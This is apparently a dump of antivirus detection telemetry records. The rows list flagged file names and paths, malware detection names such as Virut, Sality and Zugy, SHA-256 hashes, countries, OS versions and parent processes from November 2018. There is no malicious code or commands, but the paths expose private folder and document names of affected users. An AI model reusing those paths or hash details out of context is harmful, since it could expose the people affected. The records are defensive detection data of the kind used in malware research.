  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T10:37:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-155245-a0fdc490', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155245-A0FDC490', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:10:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r78xhjm', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$R78XHJM', filesize=64000, name='VBA/Dldr.Agent.nwhnf.#M1.#R1'), hash='4a49ca27de47c4b04faa416e2d8d64bc1a4ed73782e75d527c1ad2bfe9980e7d', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:02:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kh dau tranh ca.exe', filepath='H:\\\xa0\\Chuyen an ĐB718\\KH Dau tranh CA.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='25082dc46ff2ad9c2ce9b262ffbafd1b92f201df475cf0e6e88ed9e7df7a2607', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:30:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180640-7da1bdc9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_170ae493\\AVSCAN-20181101-180415-636910FF\\AVSCAN-20181101-180640-7DA1BDC9', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=317280, timestamp='2018-11-01T16:13:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:42:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155702-cc4cd62b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155702-CC4CD62B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhb52.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHB52.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:38:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lpa 2017.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\LPA 2017\\LPA 2017.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105802-5b5c7531', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bbbd5dbe\\AVSCAN-20181101-105744-59057944\\AVSCAN-20181101-105802-5B5C7531', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:58:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155322-a73f2ce3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155322-A73F2CE3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:53:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142733-69883200', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_04471ea5\\AVSCAN-20181101-142703-64C80461\\AVSCAN-20181101-142733-69883200', filesize=1408000, name='X2000M/Laroux.B.#M1.#R1'), hash='2f5f15749752e7dc7ed01e76fca7f94606b19046c89897b234a063fd7b2b21dd', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe53_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe53 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T17:04:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-26-19.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T01:49:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T00:11:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhdf22.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHDF22.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:43:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155825-da27fc6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155825-DA27FC6A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:58:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kebijakan utk karyawan 3 tahun mengenai bpjs tk & ks.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA LAPORAN AUDIT\\SURAT KEBIJAKAN UTK KARYAWAN 3 TAHUN MENGENAI BPJS TK & KS\\KEBIJAKAN UTK KARYAWAN 3 TAHUN MENGENAI BPJS TK & KS.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp1514315\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:YyhwYgxaFRAiP211FM5W \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\microsoft-powerpoint-2010_3839443743.exe', parentsize=2395416, timestamp='2018-11-01T01:45:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp7096569\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T05:46:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clover.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Clover\\Clover.exe', filesize=244000, name='PUA/SoftCnapp.QW.#M1.#R1'), hash='a26d6a79d7b4796db55a23e67b1a5911fc981b7a39e0bc847e1f35ff681be7bf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:06:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mau ly lich trich ngang (1).exe', filepath='H:\\\xa0\\USB__Data\\USB__Data\\Mau ly lich trich ngang (1).exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='7d5d2c613b9756c34903403e6e5c0f01efc402e1472ca198eb0a7534c354ead1', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:25:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210800-c2186765', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c35755c0\\AVSCAN-20181101-205751-6D3D76CC\\AVSCAN-20181101-210800-C2186765', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='cd2a73795bcd963999c929a1ad3f17695eb7e5773effdc96473fca2dc8cc20de', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:38:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\aes73\\aspenonev7.3dvd1\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='cda2c430ab5a662b70c25f640f2ad44194a5dfbc9c98580242508f6cec75209c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe779_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe779 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T11:44:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000caed', filepath='C:\\Windows\\Temp\\95c929e7-baf7-47af-b9cb-63ddd1210adc\\tmp00000149\\tmp0000caed', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='5904e3663498a9091653914d3c086c33930f9bafbd9e4c2f74d1b134c279fd78', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Lavasoft\\Ad-Aware Antivirus\\Ad-Aware Antivirus\\11.10.767.8917\\AdAwareService.exe', parentsize=712432, timestamp='2018-11-01T11:12:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124950-1fbd7904', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124928-0D6C6647\\AVSCAN-20181101-124950-1FBD7904', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:49:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='airxonix.exe', filepath='\\?\\J:\\العاب\\AirXonix1\\AirXonix.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='72c2538e557d861853f3ed6780537114ceb6256e6246e7a4e3f8a60795f986e4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a34039da41e8bd1498f64832b01f916ae51e7f2a6d844cec49d24f167ab9058a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A34039DA41E8BD1498F64832B01F916AE51E7F2A6D844CEC49D24F167AB9058A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a34039da41e8bd1498f64832b01f916ae51e7f2a6d844cec49d24f167ab9058a', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:27:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aapt.exe', filepath='F:\\FILES 1\\Lenovo_S860\\Lenovo_S860_MT6582_S116_140405\\Lenovo_S860_MT6582_S116_140405\\SN Write Tool v2.1504.00\\Android\\aapt.exe', filesize=2048000, name='W32/Sality.AT.#M1.#R1'), hash='ec7a36e3effbdcb4bba6a37fd533771c68816c6e229145413fb319854ed1f884', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T10:25:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000092e0', filepath='C:\\Windows\\Temp\\fe36dd83-f56a-4564-9418-af1ba46a01a2\\tmp000002a0\\tmp000092e0', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='b7735db29861dd5fe01302ae94a0fa51e23846a6a97e67f92cd3ede4863a771c', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.2.876.11542\\AdAwareService.exe', parentsize=585784, timestamp='2018-11-01T10:28:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195712-796db49d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ec475906\\AVSCAN-20181101-195639-75E6ACCD\\AVSCAN-20181101-195712-796DB49D', filesize=448000, name='X2000M/Laroux.FO.#M1.#R1'), hash='df3ad22b522bcd2c9b46c0caf75cf95a7908e7b51e24d668b8e32841815d1727', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-082225-8722b7b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4029e2e3\\AVSCAN-20181101-082140-7FD373D5\\AVSCAN-20181101-082225-8722B7B9', filesize=216000, name='X2000M/Agent.03377832.#M1.#R1'), hash='c52be89ae90b960543b102a1c17cfbb7ab10e25d2cbbe7d6e33ba51f48175b19', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:22:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nssF70B.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T03:29:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='018 - stamp [million ways to write part1].exe', filepath='E:\\music\\music\\Vampires 652 P\\018 - STAMP [Million ways to write part1]\\018 - STAMP [Million ways to write part1].exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='755d3a5bde52abefc6bdc48e7cc00ecebe31e3fcbb289f8a98cae8cea56175e3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:13:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='manual.exe', filepath='C:\\Users\\X\\Documents\\Call Of Duty\\Docs\\Help\\Manual\\Manual.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:10:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='uninstall.exe', filepath='\\\\?\\D:\\Games\\Kick Ass 2\\uninstall.exe', filesize=1664000, name='SPR/RedCap.d5bcb5.#M1.#R1'), hash='d5bcb5182fbe7d528baa0a81789abc91571133ea6728e4a1c77a42e3ae246df9', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:35:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spic.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Justified\\spic.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='ca23ef36c43d02666fa97ca6e35451e5d9937aab0f778200aad1f8d7a2736b7e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:40:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215607-36709519', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215607-36709519', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:56:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='愤怒的小鸟星球大战2.exe', filepath='C:\\Program Files\\fennudexiaoniaoxingqiudazhan2\\愤怒的小鸟星球大战2.exe', filesize=1024000, name='Adware/Kuaiba.1024000.1.#M1.#R1'), hash='73f81ea320a6058eb56347b49cd9fad1d0042feee31dec4a39a9b987bd131fec', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:39:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='{e303ba32-9368-4a3c-ae3a-afdadcbde48b}.scr', filepath='C:\\Users\\X\\CyberLink\\OLReg\\HKEY_CLASS_ROOT\\CLSID\\{E303BA32-9368-4a3c-AE3A-AFDADCBDE48B}\\{E303BA32-9368-4a3c-AE3A-AFDADCBDE48B}.scr', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:36:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsa5507.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:17:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trays.pif', filepath='F:\\New folder\\Corel\\Corel Content\\Trays\\Trays.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-090822-19724d82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9aa61a38\\AVSCAN-20181101-224746-B47ADADF\\AVSCAN-20181102-090822-19724D82', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:33:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T19:17:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T16:09:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.858\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.858\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:08:58Z'), dt=datetime.date(2018, 11, 1)),
